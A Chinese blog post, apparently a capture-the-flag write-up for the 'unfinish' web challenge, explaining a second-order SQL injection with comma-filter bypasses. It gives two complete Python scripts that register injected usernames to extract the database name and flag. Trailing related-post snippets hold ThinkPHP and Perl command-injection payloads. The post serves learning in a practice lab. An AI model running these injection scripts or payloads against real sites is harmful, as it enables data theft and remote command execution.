[学习笔记]攻防世界-unfinish

最新推荐文章于 2025-03-22 10:00:00 发布
最新推荐文章于 2025-03-22 10:00:00 发布
阅读量569 收藏 8
点赞数 6
分类专栏: Web笔记 文章标签: 学习 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_58742026/article/details/146399429
版权

解题流程

打开场景

尝试输入,提示密码错误,我们先用dirsearch工具扫一下网站吧

 我们发现,除了login登陆页面,还有register注册页面,访问看看

题目描述是SQL,有注册,应该是二次注入,注册的时候插入语句,登陆的时候执行语句,我们抓包试试

我尝试了一些语句

这个命令得到了注入

我尝试了联合注入,行不通,应该是过滤了,尝试了几次,比如用group_concat(1,database());#

提示nnnooo!!!,都被过滤了,后来看其他人的WP,知道了用+运算符来截取字符ASCII码,我们尝试一下

成功了,这里试了好几次,都被过滤了,后来发现过滤的是逗号,我们用from...for...代替,有一点,我在Burpsuite输入代码会有问题,后来我换成直接F12用插件Post就有反应能登陆了

我们尝试写脚本来获取库名吧

import requests
from bs4 import BeautifulSoup
#这个是html解析模块,没有这个模块的话,就用pip install beautifulsoup4命令下载吧

database = ""
for i in range(10):
    data = {"email": "00"+str(i)+"@qq.com","username": "0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0", "password": "123"}
    requests.post("http://61.147.171.105:64136/register.php", data)
    login = {"email": "00"+str(i)+"@qq.com","password": "123"}
    rest = requests.post("http://61.147.171.105:64136/login.php", login)
    html = rest.text
    res = BeautifulSoup(html, "html.parser")
    GetName = res.find_all("span")
    name = GetName[0].text
    if int(name) == 0:
        break
    print(chr(int(name)),end="")

 我们得到了库名继续查表吧,这里遇到了问题,看了其他人的WP是过滤了information,所以猜测表名就是flag

参考链接:攻防世界-web-unfinish-从0到1的解题历程writeup_ctf web unfinish-优快云博客

 

import requests
from bs4 import BeautifulSoup

database = ""
for i in range(50):#这里换一下注册和登陆的邮箱名,因为之前的查库名的时候给注册了
    data = {"email": "aaa"+str(i)+"@qq.com","username": "0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0", "password": "123"}
    requests.post("http://61.147.171.105:64136/register.php", data)
    login = {"email": "aaa"+str(i)+"@qq.com","password": "123"}
    rest = requests.post("http://61.147.171.105:64136/login.php", login)
    html = rest.text
    res = BeautifulSoup(html, "html.parser")
    GetName = res.find_all("span")
    name = GetName[0].text
    if int(name) == 0:
        break
    print(chr(int(name)),end="")

拼接flag,成功

总结

二次注入还是有点难度,主要是绕过过滤,然后找到能正常注入的语句

攻防世界Web:unfinish
Light_inthe_eyes的博客
10-20 437
打开页面后,是一个登录页面: 用御剑扫一扫,发现有注册页面: 用burpsuite抓注册页面: 尝试构造sql盲注语句:username=1' and left(database(),1)>'a'# 得到结果为nnnnoooo!!!过滤了很多 通过抓包出来的三个参数,猜测注册的语句是:insert into tables value('$email','$username','$passwpord'); 登录成功后语句:SELECT * FROM tables WHERE email = ''$em
攻防世界-web高手进阶区
zji
04-25 6888
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
xctf攻防世界 Web高手进阶区 unfinish
l8947943的博客
01-02 4244
1. 进入环境,查看页面 我的心情和这个图像一样懵逼,拿起dirsearch就是一顿乱扫。如图: 发现有register.php 2. 问题分析 登入register.php,注册相关账户并登录 直接吧usrname给显示出来了,也就是说,注册提交了usrname数据,然后又从数据库中查询了username并回显,那么问题就清晰了一丢丢,想办法通过username注入数据,在回显时候再执行。查了查相关的wp,这种方式叫做二次注入: 二次注入的原理,在第一次进行数据库插入数据的时候(注册时),仅
攻防世界----unfinish
qq_44418229的博客
08-02 831
攻防世界--unfinish SQL的二次注入
攻防世界 unfinish
CyhDl666的博客
02-25 585
题目描述:sql注入 访问进去是个登录页面 dirsearch扫描了一下 访问register.php 注册了个账号 登录进去好像没什么用 返回登录页面 但是 这里我想到了一个注入方式 在我写sql注入基础知识的时候提到过 但是 没有仔细研究 二次注入 这里注入的点应该是在register.php页面中的name中 因为邮箱和密码还需要登录时候使用 具体可以看我前面的文章 单引号注册失败了 于是我将用户名改为root' and '1这里注册成功了 也就是说这里的闭合方式应该是单引号闭合 且没有我之前学.
攻防世界web进阶区之unfinish
qq_45756971的博客
08-08 514
题目:进入所给链接,发现是一个登陆界面 我们进入注册界面题目为二次注入,参照大佬给出的代码,修改注册url和登录url即可跑出flag import requests import time from bs4 import BeautifulSoup #html解析器 def getDatabase(): database = '' for i in range(10): data_database = { 'username':"0'+
【愚公系列】2023年06月 攻防世界-Web(unfinish
时光隧道
06-15 4387
SQL注入是一种常见的攻击方式,它利用web应用程序漏洞,通过向Web应用程序提交恶意的SQL语句,从而获得对数据库的访问权限。SQL注入常见的攻击方式包括:基于错误的注入攻击(error-based):通过构造报错语句,把数据库中的错误信息暴露给攻击者,从而获取敏感信息。基于盲注的攻击(blind-based):攻击者无法直接从Web应用程序获得数据库中的信息,但是他们可以通过提交变异的查询,来判断查询结果是否正确,进而推断出数据库中的信息。
攻防世界web进阶区unfinish详解
hxhxhxhxx的博客
08-09 4480
攻防世界web进阶区unfinish详解题目详解 题目 详解 我们使用御剑,扫描一波 我们进入注册页面查看,发现这个,有注册的话猜一下二次注入(这里注入,然后去页面看结果) 我们先拿AWVS试试, 哦~我的上帝,它存在注入 我们试试,burp的fuzz看看他过滤了什么 还是过滤了蛮多的 这些是都没过滤的 既然知道了他是sql注入 那么我们为啥不用sqlmap呢 我们使用sqlmap,发现只能知道这里有注入点,但是过滤很严重 我们需要找找合适的tamper 哦~我的上帝,果然不行,看来还得看看师
攻防世界-web-i-got-id-200-从0到1的解题历程writeup
CTF小白的博客
04-17 2893
题目分析 主要的功能界面就两个 提交姓名年龄界面 文件上传界面 首先可以知道这是一个perl语言的后台 漏洞扫描了一下除了xss漏洞还有这个目录穿越漏洞 直接猜出flag文件 常规做法可以 /cgi-bin/file.pl?/bin/bash%20-c%20ls${IFS}/| 看了大佬的解释为 通过管道的方式,执行任意命令,然后将其输出结果用管道传输到读入流中,这样就可以保证获取到fla...
攻防世界-web-unfinish-从0到1的解题历程writeup
CTF小白的博客
04-18 5630
题目分析 题目描述为:SQL 题目主要功能界面分析: 主要分为注册、登陆、以及成功登陆后的一个界面。 通过描述可以知道题目应该存在SQL注入漏洞。 扫描得知注册界面存在SQL注入漏洞 尝试构造sql盲注语句如下 {‘username’: “1’ and ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1)...
攻防世界(Misc-NO.GFSJ1113-Simple-Math)
猛火烹小鲜
11-28 1197
import galois # 伽罗瓦域。
攻防世界_enc
suisuisama的博客
03-22 161
2进制转换 base64 morse
攻防世界高手进阶区通关教程(2)
玄道的网安博客
05-16 2887
我们就直接开始吧 web2 源码给出了加密后的字符串,我们解密即可 代码块 import base64 def python_decode(string): zimu = "abcdefghijklmnopqrstuvwxyz" rot_13 ="" for i in string: if i.isdigit(): rot_13 += i else: try:
记一次院赛CTF的Crypto和Re题(入门)
CTF小白的博客
04-14 7718
目录Cryptoeasy cryptobAcOn敌军密报Reeasy re跳到对的地方简单的XOR多密码表替换 Crypto easy crypto 首先,这个可以很容易的看出这是一个base64加密一串密文,然后用base64解密后是 可以看出这就是flag的格式,所以一般就是凯撒加密了,但是因为有花括号下划线之类的,所以是凯撒的一个变形rot13 bAcOn 这题是给了一个字符串baCo...
攻防世界web进阶区unfinish
gongjingege的博客
08-12 597
题目描述:SQL 题目链接有三个,登录,注册,主页 可以看出这道题考察sql注入 打开靶机链接,看到一个登陆界面 有登录就可能有注册,url栏register.php 先注册一个 注册成功后跳转到主页,同时在主页显示用户名 唔,鬼刀里的冰公主,品味不错,俺喜欢︿( ̄︶ ̄)︿ 先试着在注册界面手注吧 构造插入的注册语句 payload:insert into tables values(‘email′,′0′+ascii(substr((selectdatabase())from1for1))+′0′,
攻防世界(web高手进阶区)——1~20题
weixin_43610673的博客
03-29 6904
baby_web Training-WWW-Robots php_rce ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27...
记一次院赛CTF的WEB题(入门级别)
热门推荐
CTF小白的博客
04-14 2万+
目录签到一签到二口算小天才easy php录取查询我爱pythonSpring 这次院赛的题目比较基础,适合给刚入门CTF的小白提供一个大致CTF解题思路。(主要因为本人小白,表示能学到不少东西。) 签到一 题目中直接给了flag,提交就可以了。 签到二 这题主要考察的是基本的F12能力,查看网页源码,以及修改input输入框的长度。 口算小天才 这题通过题意,是需要让我们在1~3秒内回答...
攻防世界(web高手进阶区)——21~31题
weixin_43610673的博客
04-11 3255
FlatScience 点开的页面中的链接都是下载pdf文件的,都是英文论文什么的,先不管 测试/.git/,回显404,但有robots.txt 两个登录界面,猜测flag应该是登录admin.php拿到,通过对login.php进行注入得到密码。 login.php源码注释有提示 访问/login.php?debug,得到源码 是个sqlite的数据库,密码通过sha1加密还加了sa...
网谷杯ctf中unfinish中这道题怎么做
最新发布
03-28
### 关于网谷杯 CTF 中 `unfinish` 题目的解题思路 #### 背景分析 CTF竞赛中的Web类题目通常涉及多种漏洞利用技术,例如SQL注入、文件包含、命令执行等。根据提供的参考资料[^1],可以推测该题目可能涉及到一种特定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

郭逍遥

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值